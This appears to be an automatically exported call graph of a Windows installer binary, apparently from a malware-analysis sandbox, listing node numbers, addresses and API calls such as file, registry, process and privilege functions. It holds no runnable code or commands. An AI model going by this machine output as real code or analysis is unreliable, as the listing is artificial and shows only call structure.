4291 405b75 lstrcatW 4289->4291 4290->4184 4291->4290 4292->4245 4295 405c33 4293->4295 4296 405c21 4293->4296 4294 405c57 4294->4248 4294->4249 4295->4294 4298 405b86 CharNextW 4295->4298 4296->4295 4297 405c2e CharNextW 4296->4297 4297->4294 4298->4295 4300 40595a 4299->4300 4301 405d67 SetFileAttributesW 4299->4301 4300->4266 4300->4267 4300->4268 4301->4300 4303 405f00 4302->4303 4304 405f26 GetShortPathNameW 4302->4304 4329 405d7a GetFileAttributesW CreateFileW 4303->4329 4306 406045 4304->4306 4307 405f3b 4304->4307 4306->4283 4307->4306 4309 405f43 wsprintfA 4307->4309 4308 405f0a CloseHandle GetShortPathNameW 4308->4306 4310 405f1e 4308->4310 4311 4062a6 17 API calls 4309->4311 4310->4304 4310->4306 4312 405f6b 4311->4312 4330 405d7a GetFileAttributesW CreateFileW 4312->4330 4314 405f78 4314->4306 4315 405f87 GetFileSize GlobalAlloc 4314->4315 4316 405fa9 4315->4316 4317 40603e CloseHandle 4315->4317 4331 405dfd ReadFile 4316->4331 4317->4306 4322 405fc8 lstrcpyA 4325 405fea 4322->4325 4323 405fdc 4324 405cdf 4 API calls 4323->4324 4324->4325 4326 406021 SetFilePointer 4325->4326 4338 405e2c WriteFile 4326->4338 4329->4308 4330->4314 4332 405e1b 4331->4332 4332->4317 4333 405cdf lstrlenA 4332->4333 4334 405d20 lstrlenA 4333->4334 4335 405d28 4334->4335 4336 405cf9 lstrcmpiA 4334->4336 4335->4322 4335->4323 4336->4335 4337 405d17 CharNextA 4336->4337 4337->4334 4339 405e4a GlobalFree 4338->4339 4339->4317 4340 4015c1 4341 402c41 17 API calls 4340->4341 4342 4015c8 4341->4342 4343 405c04 4 API calls 4342->4343 4355 4015d1 4343->4355 4344 401631 4346 401663 4344->4346 4347 401636 4344->4347 4345 405b86 CharNextW 4345->4355 4349 401423 24 API calls 4346->4349 4367 401423 4347->4367 4356 40165b 4349->4356 4354 40164a SetCurrentDirectoryW 4354->4356 4355->4344 4355->4345 4357 401617 GetFileAttributesW 4355->4357 4359 405855 4355->4359 4362 4057bb CreateDirectoryW 4355->4362 4371 405838 CreateDirectoryW 4355->4371 4357->4355 4374 40665e GetModuleHandleA 4359->4374 4363 40580c GetLastError 4362->4363 4364 405808 4362->4364 4363->4364 4365 40581b SetFileSecurityW 4363->4365 4364->4355 4365->4364 4366 405831 GetLastError 4365->4366 4366->4364 4368 4052ec 24 API calls 4367->4368 4369 401431 4368->4369 4370 406284 lstrcpynW 4369->4370 4370->4354 4372 405848 4371->4372 4373 40584c GetLastError 4371->4373 4372->4355 4373->4372 4375 406684 GetProcAddress 4374->4375 4376 40667a 4374->4376 4378 40585c 4375->4378 4380 4065ee GetSystemDirectoryW 4376->4380 4378->4355 4379 406680 4379->4375 4379->4378 4381 406610 wsprintfW LoadLibraryExW 4380->4381 4381->4379 5178 404a42 5179 404a52 5178->5179 5180 404a6e 5178->5180 5189 4058ce GetDlgItemTextW 5179->5189 5182 404aa1 5180->5182 5183 404a74 SHGetPathFromIDListW 5180->5183 5185 404a84 5183->5185 5188 404a8b SendMessageW 5183->5188 5184 404a5f SendMessageW 5184->5180 5187 40140b 2 API calls 5185->5187 5187->5188 5188->5182 5189->5184 5204 73cb2c4f 5205 73cb2c67 5204->5205 5206 73cb158f 2 API calls 5205->5206 5207 73cb2c82 5206->5207 4567 401e49 4568 402c1f 17 API calls 4567->4568 4569 401e4f 4568->4569 4570 402c1f 17 API calls 4569->4570 4571 401e5b 4570->4571 4572 401e72 EnableWindow 4571->4572 4573 401e67 ShowWindow 4571->4573 4574 402ac5 4572->4574 4573->4574 4575 40264a 4576 402c1f 17 API calls 4575->4576 4577 402659 4576->4577 4578 4026a3 ReadFile 4577->4578 4579 405dfd ReadFile 4577->4579 4580 4026e3 MultiByteToWideChar 4577->4580 4581 402798 4577->4581 4584 40273c 4577->4584 4585 402709 SetFilePointer MultiByteToWideChar 4577->4585 4586 4027a9 4577->4586 4588 402796 4577->4588 4578->4577 4578->4588 4579->4577 4580->4577 4598 4061cb wsprintfW 4581->4598 4584->4577 4584->4588 4589 405e5b SetFilePointer 4584->4589 4585->4577 4587 4027ca SetFilePointer 4586->4587 4586->4588 4587->4588 4590 405e77 4589->4590 4597 405e8f 4589->4597 4591 405dfd ReadFile 4590->4591 4592 405e83 4591->4592 4593 405ec0 SetFilePointer 4592->4593 4594 405e98 SetFilePointer 4592->4594 4592->4597 4593->4597 4594->4593 4595 405ea3 4594->4595 4596 405e2c WriteFile 4595->4596 4596->4597 4597->4584 4598->4588 5218 4016cc 5219 402c41 17 API calls 5218->5219 5220 4016d2 GetFullPathNameW 5219->5220 5221 4016ec 5220->5221 5227 40170e 5220->5227 5223 4065c7 2 API calls 5221->5223 5221->5227 5222 401723 GetShortPathNameW 5224 402ac5 5222->5224 5225 4016fe 5223->5225 5225->5227 5228 406284 lstrcpynW 5225->5228 5227->5222 5227->5224 5228->5227 5229 40234e 5230 402c41 17 API calls 5229->5230 5231 40235d 5230->5231 5232 402c41 17 API calls 5231->5232 5233 402366 5232->5233 5234 402c41 17 API calls 5233->5234 5235 402370 GetPrivateProfileStringW 5234->5235 5236 401b53 5237 402c41 17 API calls 5236->5237 5238 401b5a 5237->5238 5239 402c1f 17 API calls 5238->5239 5240 401b63 wsprintfW 5239->5240 5241 402ac5 5240->5241 5242 73cb16d8 5243 73cb1707 5242->5243 5244 73cb1b63 22 API calls 5243->5244 5245 73cb170e 5244->5245 5246 73cb1721 5245->5246 5247 73cb1715 5245->5247 5249 73cb172b 5246->5249 5250 73cb1748 5246->5250 5248 73cb1272 2 API calls 5247->5248 5253 73cb171f 5248->5253 5254 73cb153d 3 API calls 5249->5254 5251 73cb174e 5250->5251 5252 73cb1772 5250->5252 5256 73cb15b4 3 API calls 5251->5256 5257 73cb153d 3 API calls 5252->5257 5255 73cb1730 5254->5255 5258 73cb15b4 3 API calls 5255->5258 5259 73cb1753 5256->5259 5257->5253 5260 73cb1736 5258->5260 5261 73cb1272 2 API calls 5259->5261 5262 73cb1272 2 API calls 5260->5262 5263 73cb1759 GlobalFree 5261->5263 5264 73cb173c GlobalFree 5262->5264 5263->5253 5265 73cb176d GlobalFree 5263->5265 5264->5253 5265->5253 5266 73cb1058 5268 73cb1074 5266->5268 5267 73cb10dd 5268->5267 5270 73cb1092 5268->5270 5279 73cb1516 5268->5279 5271 73cb1516 GlobalFree 5270->5271 5272 73cb10a2 5271->5272 5273 73cb10a9 GlobalSize 5272->5273 5274 73cb10b2 5272->5274 5273->5274 5275 73cb10c7 5274->5275 5276 73cb10b6 GlobalAlloc 5274->5276 5278 73cb10d2 GlobalFree 5275->5278 5277 73cb153d 3 API calls 5276->5277 5277->5275 5278->5267 5281 73cb151c 5279->5281 5280 73cb1522 5280->5270 5281->5280 5282 73cb152e GlobalFree 5281->5282 5282->5270 5283 401956 5284 402c41 17 API calls 5283->5284 5285 40195d lstrlenW 5284->5285 5286 402592 5285->5286 5287 73cb18dd 5288 73cb1900 5287->5288 5289 73cb1935 GlobalFree 5288->5289 5290 73cb1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5288->5290 5289->5290 5291 73cb1272 2 API calls 5290->5291 5292 73cb1ad2 GlobalFree GlobalFree 5291->5292 5293 4014d7 5294 402c1f 17 API calls 5293->5294 5295 4014dd Sleep 5294->5295 5297 402ac5 5295->5297 5298 401f58 5299 402c41 17 API calls 5298->5299 5300 401f5f 5299->5300 5301 4065c7 2 API calls 5300->5301 5302 401f65 5301->5302 5304 401f76 5302->5304 5305 4061cb wsprintfW 5302->5305 5305->5304 4929 403359 SetErrorMode GetVersion 4930 403398 4929->4930 4931 40339e 4929->4931 4932 40665e 5 API calls 4930->4932 4933 4065ee 3 API calls 4931->4933 4932->4931 4934 4033b4 lstrlenA 4933->4934 4934->4931 4935 4033c4 4934->4935 4936 40665e 5 API calls 4935->4936 4937 4033cb 4936->4937 4938 40665e 5 API calls 4937->4938 4939 4033d2 4938->4939 4940 40665e 5 API calls 4939->4940 4941 4033de #17 OleInitialize SHGetFileInfoW 4940->4941 5019 406284 lstrcpynW 4941->5019 4944 40342a GetCommandLineW 5020 406284 lstrcpynW 4944->5020 4946 40343c 4947 405b86 CharNextW 4946->4947 4948 403461 CharNextW 4947->4948 4949 40358b GetTempPathW 4948->4949 4957 40347a 4948->4957 5021 403328 4949->5021 4951 4035a3 4952 4035a7 GetWindowsDirectoryW lstrcatW 4951->4952 4953 4035fd DeleteFileW 4951->4953 4954 403328 12 API calls 4952->4954 5031 402edd GetTickCount GetModuleFileNameW 4953->5031 4958 4035c3 4954->4958 4955 405b86 CharNextW 4955->4957 4957->4955 4963 403576 4957->4963 4965 403574 4957->4965 4958->4953 4960 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4958->4960 4959 403611 4961 4036c4 4959->4961 4966 4036b4 4959->4966 4970 405b86 CharNextW 4959->4970 4964 403328 12 API calls 4960->4964 5118 40389a 4961->5118 5115 406284 lstrcpynW 4963->5115 4968 4035f5 4964->4968 4965->4949 5059 403974 4966->5059 4968->4953 4968->4961 4983 403630 4970->4983 4972 4037fe 4975 403882 ExitProcess 4972->4975 4976 403806 GetCurrentProcess OpenProcessToken 4972->4976 4973 4036de 4974 4058ea MessageBoxIndirectW 4973->4974 4978 4036ec ExitProcess 4974->4978 4981 403852 4976->4981 4982 40381e LookupPrivilegeValueW AdjustTokenPrivileges 4976->4982 4979 4036f4 4985 405855 5 API calls 4979->4985 4980 40368e 4984 405c61 18 API calls 4980->4984 4986 40665e 5 API calls 4981->4986 4982->4981 4983->4979 4983->4980 4987 40369a 4984->4987 4988 4036f9 lstrcatW 4985->4988 4989 403859 4986->4989 4987->4961 5116 406284 lstrcpynW 4987->5116 4990 403715 lstrcatW lstrcmpiW 4988->4990 4991 40370a lstrcatW 4988->4991 4992 40386e ExitWindowsEx 4989->4992 4993 40387b 4989->4993 4990->4961 4995 403731 4990->4995 4991->4990 4992->4975 4992->4993 4996 40140b 2 API calls 4993->4996 4998 403736 4995->4998 4999 40373d 4995->4999 4996->4975 4997 4036a9 5117 406284 lstrcpynW 4997->5117 5002 4057bb 4 API calls 4998->5002 5000 405838 2 API calls 4999->5000 5003 403742 SetCurrentDirectoryW 5000->5003 5004 40373b 5002->5004 5005 403752 5003->5005 5006 40375d 5003->5006 5004->5003 5125 406284 lstrcpynW 5005->5125 5126 406284 lstrcpynW 5006->5126 5009 4062a6 17 API calls 5010 40379c DeleteFileW 5009->5010 5011 4037a9 CopyFileW 5010->5011 5016 40376b 5010->5016 5011->5016 5012 4037f2 5013 40604a 36 API calls 5012->5013 5013->4961 5014 40604a 36 API calls 5014->5016 5015 4062a6 17 API calls 5015->5016 5016->5009 5016->5012 5016->5014 5016->5015 5018 4037dd CloseHandle 5016->5018 5127 40586d CreateProcessW 5016->5127 5018->5016 5019->4944 5020->4946 5022 406518 5 API calls 5021->5022 5023 403334 5022->5023 5024 40333e 5023->5024 5025 405b59 3 API calls 5023->5025 5024->4951 5026 403346 5025->5026 5027 405838 2 API calls 5026->5027 5028 40334c 5027->5028 5130 405da9 5028->5130 5134 405d7a GetFileAttributesW CreateFileW 5031->5134 5033 402f1d 5053 402f2d 5033->5053 5135 406284 lstrcpynW 5033->5135 5035 402f43 5036 405ba5 2 API calls 5035->5036 5037 402f49 5036->5037 5136 406284 lstrcpynW 5037->5136 5039 402f54 GetFileSize 5040 403050 5039->5040 5041 402f6b 5039->5041 5137 402e79 5040->5137 5041->5040 5044 4032fb ReadFile 5041->5044 5047 4030bc 5041->5047 5041->5053 5056 402e79 6 API calls 5041->5056 5043 403059 5045 403089 GlobalAlloc 5043->5045 5043->5053 5149 403311 SetFilePointer 5043->5149 5044->5041 5148 403311 SetFilePointer 5045->5148 5050 402e79 6 API calls 5047->5050 5049 4030a4 5052 403116 35 API calls 5049->5052 5050->5053 5051 403072 5054 4032fb ReadFile 5051->5054 5057 4030b0 5052->5057 5053->4959 5055 40307d 5054->5055 5055->5045 5055->5053 5056->5041 5057->5053 5058 4030ed SetFilePointer 5057->5058 5058->5053 5060 40665e 5 API calls 5059->5060 5061 403988 5060->5061 5062 4039a0 5061->5062 5063 40398e 5061->5063 5064 406152 3 API calls 5062->5064 5162 4061cb wsprintfW 5063->5162 5065 4039d0 5064->5065 5067 4039ef lstrcatW 5065->5067 5069 406152 3 API calls 5065->5069 5068 40399e 5067->5068 5154 403c4a 5068->5154 5069->5067 5072 405c61 18 API calls 5073 403a21 5072->5073 5074 403ab5 5073->5074 5077 406152 3 API calls 5073->5077 5075 405c61 18 API calls 5074->5075 5076 403abb 5075->5076 5079 403acb LoadImageW 5076->5079 5080 4062a6 17 API calls 5076->5080 5078 403a53 5077->5078 5078->5074 5083 403a74 lstrlenW 5078->5083 5086 405b86 CharNextW 5078->5086 5081 403b71 5079->5081 5082 403af2 RegisterClassW 5079->5082 5080->5079 5085 40140b 2 API calls 5081->5085 5084 403b28 SystemParametersInfoW CreateWindowExW 5082->5084 5114 403b7b 5082->5114 5087 403a82 lstrcmpiW 5083->5087 5088 403aa8 5083->5088 5084->5081 5089 403b77 5085->5089 5090 403a71 5086->5090 5087->5088 5091 403a92 GetFileAttributesW 5087->5091 5092 405b59 3 API calls 5088->5092 5094 403c4a 18 API calls 5089->5094 5089->5114 5090->5083 5093 403a9e 5091->5093 5095 403aae 5092->5095 5093->5088 5096 405ba5 2 API calls 5093->5096 5097 403b88 5094->5097 5163 406284 lstrcpynW 5095->5163 5096->5088 5099 403b94 ShowWindow 5097->5099 5100 403c17 5097->5100 5102 4065ee 3 API calls 5099->5102 5101 4053bf 5 API calls 5100->5101 5104 403c1d 5101->5104 5103 403bac 5102->5103 5105 403bba GetClassInfoW 5103->5105 5108 4065ee 3 API calls 5103->5108 5106 403c21 5104->5106 5107 403c39 5104->5107 5110 403be4 DialogBoxParamW 5105->5110 5111 403bce GetClassInfoW RegisterClassW 5105->5111 5113 40140b 2 API calls 5106->5113 5106->5114 5109 40140b 2 API calls 5107->5109 5108->5105 5109->5114 5112 40140b 2 API calls 5110->5112 5111->5110 5112->5114 5113->5114 5114->4961 5115->4965 5116->4997 5117->4966 5119 4038b2 5118->5119 5120 4038a4 CloseHandle 5118->5120 5165 4038df 5119->5165 5120->5119 5123 405996 67 API calls 5124 4036cd OleUninitialize 5123->5124 5124->4972 5124->4973 5125->5006 5126->5016 5128 4058a0 CloseHandle 5127->5128 5129 4058ac 5127->5129 5128->5129 5129->5016 5131 405db6 GetTickCount GetTempFileNameW 5130->5131 5132 403357 5131->5132 5133 405dec 5131->5133 5132->4951 5133->5131 5133->5132 5134->5033 5135->5035 5136->5039 5138 402e82 5137->5138 5139 402e9a 5137->5139 5140 402e92 5138->5140 5141 402e8b DestroyWindow 5138->5141 5142 402ea2 5139->5142 5143 402eaa GetTickCount 5139->5143 5140->5043 5141->5140 5150 40669a 5142->5150 5145 402eb8 CreateDialogParamW ShowWindow 5143->5145 5146 402edb 5143->5146 5145->5146 5146->5043 5148->5049 5149->5051 5151 4066b7 PeekMessageW 5150->5151 5152 402ea8 5151->5152 5153 4066ad DispatchMessageW 5151->5153 5152->5043 5153->5151 5155 403c5e 5154->5155 5164 4061cb wsprintfW 5155->5164 5157 403ccf 5158 403d03 18 API calls 5157->5158 5160 403cd4 5158->5160 5159 4039ff 5159->5072 5160->5159 5161 4062a6 17 API calls 5160->5161 5161->5160 5162->5068 5163->5074 5164->5157 5166 4038ed 5165->5166 5167 4038b7 5166->5167 5168 4038f2 FreeLibrary GlobalFree 5166->5168 5167->5123 5168->5167 5168->5168 5306 402259 5307 402c41 17 API calls 5306->5307 5308 40225f 5307->5308 5309 402c41 17 API calls 5308->5309 5310 402268 5309->5310 5311 402c41 17 API calls 5310->5311 5312 402271 5311->5312 5313 4065c7 2 API calls 5312->5313 5314 40227a 5313->5314 5315 40228b lstrlenW lstrlenW 5314->5315 5320 40227e 5314->5320 5317 4052ec 24 API calls 5315->5317 5316 4052ec 24 API calls 5318 402286 5316->5318 5319 4022c9 SHFileOperationW 5317->5319 5319->5318 5319->5320 5320->5316 5169 40175c 5170 402c41 17 API calls 5169->5170 5171 401763 5170->5171 5172 405da9 2 API calls 5171->5172 5173 40176a 5172->5173 5174 405da9 2 API calls 5173->5174 5174->5173 5328 401d5d GetDlgItem GetClientRect 5329 402c41 17 API calls 5328->5329 5330 401d8f LoadImageW SendMessageW 5329->5330 5331 402ac5 5330->5331 5332 401dad DeleteObject 5330->5332 5332->5331 5333 4022dd 5334 4022e4 5333->5334 5338 4022f7 5333->5338 5335 4062a6 17 API calls 5334->5335 5336 4022f1 5335->5336 5337 4058ea MessageBoxIndirectW 5336->5337 5337->5338 5339 405260 5340 405270 5339->5340 5341 405284 5339->5341 5342 405276 5340->5342 5343 4052cd 5340->5343 5344 40528c IsWindowVisible 5341->5344 5350 4052a3 5341->5350 5346 404247 SendMessageW 5342->5346 5345 4052d2 CallWindowProcW 5343->5345 5344->5343 5347 405299 5344->5347 5349 405280 5345->5349 5346->5349 5352 404bb6 SendMessageW 5347->5352 5350->5345 5357 404c36 5350->5357 5353 404c15 SendMessageW 5352->5353 5354 404bd9 GetMessagePos ScreenToClient SendMessageW 5352->5354 5356 404c0d 5353->5356 5355 404c12 5354->5355 5354->5356 5355->5353 5356->5350 5366 406284 lstrcpynW 5357->5366 5359 404c49 5367 4061cb wsprintfW 5359->5367 5361 404c53 5362 40140b 2 API calls 5361->5362 5363 404c5c 5362->5363 5368 406284 lstrcpynW 5363->5368 5365 404c63 5365->5343 5366->5359 5367->5361 5368->5365 5369 401563 5370 402a6b 5369->5370 5373 4061cb wsprintfW 5370->5373 5372 402a70 5373->5372 4490 4023e4 4491 402c41 17 API calls 4490->4491 4492 4023f6 4491->4492 4493 402c41 17 API calls 4492->4493 4494 402400 4493->4494 4507 402cd1 4494->4507 4497 402438 4505 402444 4497->4505 4511 402c1f 4497->4511 4498 40288b 4499 402c41 17 API calls 4501 40242e lstrlenW 4499->4501 4500 402463 RegSetValueExW 4504 402479 RegCloseKey 4500->4504 4501->4497 4504->4498 4505->4500 4514 403116 4505->4514 4508 402cec 4507->4508 4535 40611f 4508->4535 4512 4062a6 17 API calls 4511->4512 4513 402c34 4512->4513 4513->4505 4515 40312f 4514->4515 4516 40315a 4515->4516 4549 403311 SetFilePointer 4515->4549 4539 4032fb 4516->4539 4520 403177 GetTickCount 4531 40318a 4520->4531 4521 40329b 4522 40329f 4521->4522 4527 4032b7 4521->4527 4524 4032fb ReadFile 4522->4524 4523 403285 4523->4500 4524->4523 4525 4032fb ReadFile 4525->4527 4526 4032fb ReadFile 4526->4531 4527->4523 4527->4525 4528 405e2c WriteFile 4527->4528 4528->4527 4530 4031f0 GetTickCount 4530->4531 4531->4523 4531->4526 4531->4530 4532 403219 MulDiv wsprintfW 4531->4532 4534 405e2c WriteFile 4531->4534 4542 4067df 4531->4542 4533 4052ec 24 API calls 4532->4533 4533->4531 4534->4531 4536 40612e 4535->4536 4537 402410 4536->4537 4538 406139 RegCreateKeyExW 4536->4538 4537->4497 4537->4498 4537->4499 4538->4537 4540 405dfd ReadFile 4539->4540 4541 403165 4540->4541 4541->4520 4541->4521 4541->4523 4543 406804 4542->4543 4544 40680c 4542->4544 4543->4531 4544->4543 4545 406893 GlobalFree 4544->4545 4546 40689c GlobalAlloc 4544->4546 4547 406913 GlobalAlloc 4544->4547 4548 40690a GlobalFree 4544->4548 4545->4546 4546->4543 4546->4544 4547->4543 4547->4544 4548->4547 4549->4516 5374 404c68 GetDlgItem GetDlgItem 5375 404cba 7 API calls 5374->5375 5378 404ed3 5374->5378 5376 404d50 SendMessageW 5375->5376 5377 404d5d DeleteObject 5375->5377 5376->5377 5379 404d66 5377->5379 5390 404bb6 5 API calls 5378->5390 5395 404fb7 5378->5395 5404 404f44 5378->5404 5380 404d9d 5379->5380 5383 4062a6 17 API calls 5379->5383 5381 4041fb 18 API calls 5380->5381 5387 404db1 5381->5387 5382 405063 5384 405075 5382->5384 5385 40506d SendMessageW 5382->5385 5386 404d7f SendMessageW SendMessageW 5383->5386 5396 405087 ImageList_Destroy 5384->5396 5397 40508e 5384->5397 5405 40509e 5384->5405 5385->5384 5386->5379 5391 4041fb 18 API calls 5387->5391 5388 404ec6 5393 404262 8 API calls 5388->5393 5389 404fa9 SendMessageW 5389->5395 5390->5404 5409 404dbf 5391->5409 5392 405010 SendMessageW 5392->5388 5399 405025 SendMessageW 5392->5399 5394 405259 5393->5394 5395->5382 5395->5388 5395->5392 5396->5397 5400 405097 GlobalFree 5397->5400 5397->5405 5398 40520d 5398->5388 5406 40521f ShowWindow GetDlgItem ShowWindow 5398->5406 5402 405038 5399->5402 5400->5405 5401 404e94 GetWindowLongW SetWindowLongW 5403 404ead 5401->5403 5413 405049 SendMessageW 5402->5413 5407 404eb3 ShowWindow 5403->5407 5408 404ecb 5403->5408 5404->5389 5404->5395 5405->5398 5417 404c36 4 API calls 5405->5417 5421 4050d9 5405->5421 5406->5388 5425 404230 SendMessageW 5407->5425 5426 404230 SendMessageW 5408->5426 5409->5401 5412 404e0f SendMessageW 5409->5412 5414 404e8e 5409->5414 5415 404e4b SendMessageW 5409->5415 5416 404e5c SendMessageW 5409->5416 5412->5409 5413->5382 5414->5401 5414->5403 5415->5409 5416->5409 5417->5421 5418 4051e3 InvalidateRect 5418->5398 5419 4051f9 5418->5419 5427 404b71 5419->5427 5420 405107 SendMessageW 5424 40511d 5420->5424 5421->5420 5421->5424 5423 405191 SendMessageW SendMessageW 5423->5424 5424->5418 5424->5423 5425->5388 5426->5378 5430 404aa8 5427->5430 5429 404b86 5429->5398 5431 404ac1 5430->5431 5432 4062a6 17 API calls 5431->5432 5433 404b25 5432->5433 5434 4062a6 17 API calls 5433->5434 5435 404b30 5434->5435 5436 4062a6 17 API calls 5435->5436 5437 404b46 lstrlenW wsprintfW SetDlgItemTextW 5436->5437 5437->5429 5438 402868 5439 402c41 17 API calls 5438->5439 5440 40286f FindFirstFileW 5439->5440 5441 402882 5440->5441 5442 402897 5440->5442 5446 4061cb wsprintfW 5442->5446 5444 4028a0 5447 406284 lstrcpynW 5444->5447 5446->5444 5447->5441 5448 401968 5449 402c1f 17 API calls 5448->5449 5450 40196f 5449->5450 5451 402c1f 17 API calls 5450->5451 5452 40197c 5451->5452 5453 402c41 17 API calls 5452->5453 5454 401993 lstrlenW 5453->5454 5455 4019a4 5454->5455 5456 4019e5 5455->5456 5460 406284 lstrcpynW 5455->5460 5458 4019d5 5458->5456 5459 4019da lstrlenW 5458->5459 5459->5456 5460->5458 5461 40166a 5462 402c41 17 API calls 5461->5462 5463 401670 5462->5463 5464 4065c7 2 API calls 5463->5464 5465 401676 5464->5465 5466 73cb10e1 5475 73cb1111 5466->5475 5467 73cb11d8 GlobalFree 5468 73cb12ba 2 API calls 5468->5475 5469 73cb11d3 5469->5467 5470 73cb1272 2 API calls 5473 73cb11c4 GlobalFree 5470->5473 5471 73cb1164 GlobalAlloc 5471->5475 5472 73cb11f8 GlobalFree 5472->5475 5473->5475 5474 73cb12e1 lstrcpyW 5474->5475 5475->5467 5475->5468 5475->5469 5475->5470 5475->5471 5475->5472 5475->5473 5475->5474 5476 40436b lstrlenW 5477 40438a 5476->5477 5478 40438c WideCharToMultiByte 5476->5478 5477->5478 5479 4046ec 5480 404718 5479->5480 5481 404729 5479->5481 5540 4058ce GetDlgItemTextW 5480->5540 5483 404735 GetDlgItem 5481->5483 5484 404794 5481->5484 5487 404749 5483->5487 5485 404878 5484->5485 5492 4062a6 17 API calls 5484->5492 5538 404a27 5484->5538 5485->5538 5542 4058ce GetDlgItemTextW 5485->5542 5486 404723 5488 406518 5 API calls 5486->5488 5490 40475d SetWindowTextW 5487->5490 5491 405c04 4 API calls 5487->5491 5488->5481 5494 4041fb 18 API calls 5490->5494 5496 404753 5491->5496 5497 404808 SHBrowseForFolderW 5492->5497 5493 4048a8 5498 405c61 18 API calls 5493->5498 5499 404779 5494->5499 5495 404262 8 API calls 5500 404a3b 5495->5500 5496->5490 5504 405b59 3 API calls 5496->5504 5497->5485 5501 404820 CoTaskMemFree 5497->5501 5502 4048ae 5498->5502 5503 4041fb 18 API calls 5499->5503 5505 405b59 3 API calls 5501->5505 5543 406284 lstrcpynW 5502->5543 5506 404787 5503->5506 5504->5490 5510 40482d 5505->5510 5541 404230 SendMessageW 5506->5541 5509 404864 SetDlgItemTextW 5509->5485 5510->5509 5515 4062a6 17 API calls 5510->5515 5511 40478d 5513 40665e 5 API calls 5511->5513 5512 4048c5 5514 40665e 5 API calls 5512->5514 5513->5484 5521 4048cc 5514->5521 5516 40484c lstrcmpiW 5515->5516 5516->5509 5519 40485d lstrcatW 5516->5519 5517 40490d 5544 406284 lstrcpynW 5517->5544 5519->5509 5520 404914 5522 405c04 4 API calls 5520->5522 5521->5517 5525 405ba5 2 API calls 5521->5525 5527 404965 5521->5527 5523 40491a GetDiskFreeSpaceW 5522->5523 5526 40493e MulDiv 5523->5526 5523->5527 5525->5521 5526->5527 5528 4049d6 5527->5528 5530 404b71 20 API calls 5527->5530 5529 4049f9 5528->5529 5531 40140b 2 API calls 5528->5531 5545 40421d KiUserCallbackDispatcher 5529->5545 5532 4049c3 5530->5532 5531->5529 5534 4049d8 SetDlgItemTextW 5532->5534 5535 4049c8 5532->5535 5534->5528 5537 404aa8 20 API calls 5535->5537 5536 404a15 5536->5538 5546 404645 5536->5546 5537->5528 5538->5495 5540->5486 5541->5511 5542->5493 5543->5512 5544->5520 5545->5536 5547 404653 5546->5547 5548 404658 SendMessageW 5546->5548 5547->5548 5548->5538 4665 40176f 4666 402c41 17 API calls 4665->4666 4667 401776 4666->4667 4668 401796 4667->4668 4669 40179e 4667->4669 4705 406284 lstrcpynW 4668->4705 4706 406284 lstrcpynW 4669->4706 4672 40179c 4676 406518 5 API calls 4672->4676 4673 4017a9 4674 405b59 3 API calls 4673->4674 4675 4017af lstrcatW 4674->4675 4675->4672 4694 4017bb 4676->4694 4677 4017f7 4679 405d55 2 API calls 4677->4679 4678 4065c7 2 API calls 4678->4694 4679->4694 4681 4017cd CompareFileTime 4681->4694 4682 40188d 4684 4052ec 24 API calls 4682->4684 4683 401864 4685 4052ec 24 API calls 4683->4685 4703 401879 4683->4703 4687 401897 4684->4687 4685->4703 4686 406284 lstrcpynW 4686->4694 4688 403116 35 API calls 4687->4688 4689 4018aa 4688->4689 4690 4018be SetFileTime 4689->4690 4691 4018d0 CloseHandle 4689->4691 4690->4691 4693 4018e1 4691->4693 4691->4703 4692 4062a6 17 API calls 4692->4694 4695 4018e6 4693->4695 4696 4018f9 4693->4696 4694->4677 4694->4678 4694->4681 4694->4682 4694->4683 4694->4686 4694->4692 4704 405d7a GetFileAttributesW CreateFileW 4694->4704 4707 4058ea 4694->4707 4697 4062a6 17 API calls 4695->4697 4698 4062a6 17 API calls 4696->4698 4700 4018ee lstrcatW 4697->4700 4701 401901 4698->4701 4700->4701 4702 4058ea MessageBoxIndirectW 4701->4702 4702->4703 4704->4694 4705->4672 4706->4673 4708 4058ff 4707->4708 4709 405913 MessageBoxIndirectW 4708->4709 4710 40594b 4708->4710 4709->4710 4710->4694 4711 4027ef 4712 4027f6 4711->4712 4714 402a70 4711->4714 4713 402c1f 17 API calls 4712->4713 4715 4027fd 4713->4715 4716 40280c SetFilePointer 4715->4716 4716->4714 4717 40281c 4716->4717 4719 4061cb wsprintfW 4717->4719 4719->4714 5549 401a72 5550 402c1f 17 API calls 5549->5550 5551 401a7b 5550->5551 5552 402c1f 17 API calls 5551->5552 5553 401a20 5552->5553 5561 401573 5562 401583 ShowWindow 5561->5562 5563 40158c 5561->5563 5562->5563 5564 402ac5 5563->5564 5565 40159a ShowWindow 5563->5565 5565->5564 5566 401cf3 5567 402c1f 17 API calls 5566->5567 5568 401cf9 IsWindow 5567->5568 5569 401a20 5568->5569 5570 402df3 5571 402e05 SetTimer 5570->5571 5573 402e1e 5570->5573 5571->5573 5572 402e73 5573->5572 5574 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5573->5574 5574->5572 5575 4014f5 SetForegroundWindow 5576 402ac5 5575->5576 5577 402576 5578 402c41 17 API calls 5577->5578 5579 40257d 5578->5579 5582 405d7a GetFileAttributesW CreateFileW 5579->5582 5581 402589 5582->5581 4906 401b77 4907 401b84 4906->4907 4908 401bc8 4906->4908 4911 401c0d 4907->4911 4914 401b9b 4907->4914 4909 401bf2 GlobalAlloc 4908->4909 4910 401bcd 4908->4910 4913 4062a6 17 API calls 4909->4913 4920 4022f7 4910->4920 4927 406284 lstrcpynW 4910->4927 4912 4062a6 17 API calls 4911->4912 4911->4920 4915 4022f1 4912->4915 4913->4911 4925 406284 lstrcpynW 4914->4925 4921 4058ea MessageBoxIndirectW 4915->4921 4918 401bdf GlobalFree 4918->4920 4919 401baa 4926 406284 lstrcpynW 4919->4926 4921->4920 4923 401bb9 4928 406284 lstrcpynW 4923->4928 4925->4919 4926->4923 4927->4918 4928->4920 5583 4024f8 5584 402c81 17 API calls 5583->5584 5585 402502 5584->5585 5586 402c1f 17 API calls 5585->5586 5587 40250b 5586->5587 5588 40288b 5587->5588 5589 402533 RegEnumValueW 5587->5589 5590 402527 RegEnumKeyW 5587->5590 5591 402548 RegCloseKey 5589->5591 5590->5591 5591->5588 5593 73cb1671 5594 73cb1516 GlobalFree 5593->5594 5597 73cb1689 5594->5597 5595 73cb16cf GlobalFree 5596 73cb16a4 5596->5595 5597->5595 5597->5596 5598 73cb16bb VirtualFree 5597->5598 5598->5595 5599 40167b 5600 402c41 17 API calls 5599->5600 5601 401682 5600->5601 